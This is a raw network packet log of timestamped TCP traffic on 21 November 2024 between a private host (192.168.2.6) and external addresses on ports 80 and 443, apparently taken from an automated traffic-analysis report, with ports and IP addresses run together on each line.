                                                                                                                                                                        Nov 21, 2024 10:37:49.538480997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.538589001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.538830042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.539356947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.539474964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.539530993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.540277004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.540452003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.540501118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.541213036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.541356087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.541502953 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.542152882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.542510033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.542555094 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.543330908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.543349981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.543488979 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.544029951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.544121027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.544162989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.544938087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.545228958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.545275927 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.545861959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.545967102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.546005964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.546719074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.546850920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.546901941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.547696114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.547822952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.547910929 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.548609018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.548727989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.548767090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.549525976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.549669027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.549711943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.550462961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.550544977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.550698042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.551407099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.551526070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.551587105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.552258968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.552392960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.552495003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.553189993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.553297997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.553332090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.554250956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.554389954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.554455996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.555078030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.555222034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.555267096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.555972099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.556081057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.556126118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.556936979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.557002068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.557049990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.557869911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.557883978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.557936907 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.558773994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.558851004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.558947086 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.559632063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.559742928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.559793949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.560647964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.560765982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.560817957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.561491966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.561623096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.561661959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.819689989 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.819914103 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.819983959 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.820198059 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.820216894 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.820229053 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.820234060 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.822887897 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.822921991 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.823028088 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.823329926 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.823343039 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.137154102 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.146186113 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.146202087 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.146640062 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.146645069 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.580379009 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.580435991 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.580485106 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.644500971 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.644524097 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.644535065 CET49798443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.644541979 CET4434979813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.721884966 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.721904039 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:50.721966982 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.829935074 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:50.829952955 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.175903082 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.220330000 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.221530914 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.221550941 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.223788023 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.227350950 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.227363110 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.240279913 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.240289927 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.246057034 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.246068001 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.286823034 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.287194014 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.287211895 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.287622929 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.287626982 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.612360954 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.613044977 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.613060951 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.613543987 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.613550901 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.639878035 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.639964104 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.640014887 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.640144110 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.640156031 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.640167952 CET49799443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.640172958 CET4434979913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.643846035 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.643877983 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.643968105 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.644090891 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.644115925 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.678003073 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.678077936 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.678128958 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.688096046 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.688096046 CET49800443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.688108921 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.688117981 CET4434980013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.692682981 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.692713022 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.692768097 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.693928003 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.693943977 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.732681990 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.732763052 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.732806921 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.732966900 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.732986927 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.732995987 CET49801443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.733000994 CET4434980113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.735574007 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.735609055 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:51.735677004 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.735836029 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:51.735847950 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.055881023 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.056054115 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.056140900 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.056232929 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.056232929 CET49802443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.056252003 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.056262016 CET4434980213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.059307098 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.059349060 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.059442043 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.059640884 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.059648037 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.677536011 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.678122997 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.678134918 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:52.678741932 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:52.678746939 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.247967005 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.248122931 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.248208046 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.248327017 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.248336077 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.248369932 CET49803443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.248379946 CET4434980313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.250818014 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.250837088 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.250910044 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.251050949 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.251061916 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.380476952 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.380506992 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.380578041 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.381148100 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.381160975 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.385103941 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.385150909 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.385221004 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.385763884 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:53.385778904 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.422193050 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.422810078 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.422828913 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.423269033 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.423273087 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.515477896 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.515897989 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.515917063 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.516346931 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.516350985 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.794256926 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.845330000 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.871501923 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.871737957 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.871808052 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.911147118 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.954716921 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:53.975344896 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.975446939 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:53.975514889 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.244484901 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.244508982 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.245351076 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.245358944 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.245481968 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.245510101 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.245531082 CET49806443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.245537996 CET4434980613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.247123957 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.247128963 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.247142076 CET49804443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.247144938 CET4434980413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.248687983 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.248703957 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.249211073 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.249217987 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.268240929 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.268275023 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.268325090 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.271399975 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.271435022 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.271500111 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.271627903 CET49811443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.271642923 CET4434981113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.282567024 CET49812443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.282579899 CET4434981213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.583391905 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.583473921 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.583547115 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.584199905 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.584216118 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.584224939 CET49807443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.584228992 CET4434980713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.585655928 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.585716963 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.585766077 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.585774899 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.585886955 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.585937977 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.586483002 CET49805443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.586487055 CET4434980513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.592643976 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.592724085 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.592797995 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.594731092 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.594750881 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.594795942 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.596148968 CET49813443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.596184015 CET4434981313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:54.596632004 CET49814443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:54.596646070 CET4434981413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.097876072 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.098597050 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.098620892 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.099401951 CET49808443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:55.099406958 CET4434980813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.149594069 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.149755001 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.156665087 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.156676054 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.157027960 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.159286976 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.159347057 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.159353018 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.159667969 CET49809443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.199985027 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.200052023 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.201824903 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.201833963 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.202172041 CET4434981040.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.203372002 CET4434980940.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:55.204375982 CET49810443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:37:55.204437017 CET49810443192.168.2.640.113.110.67
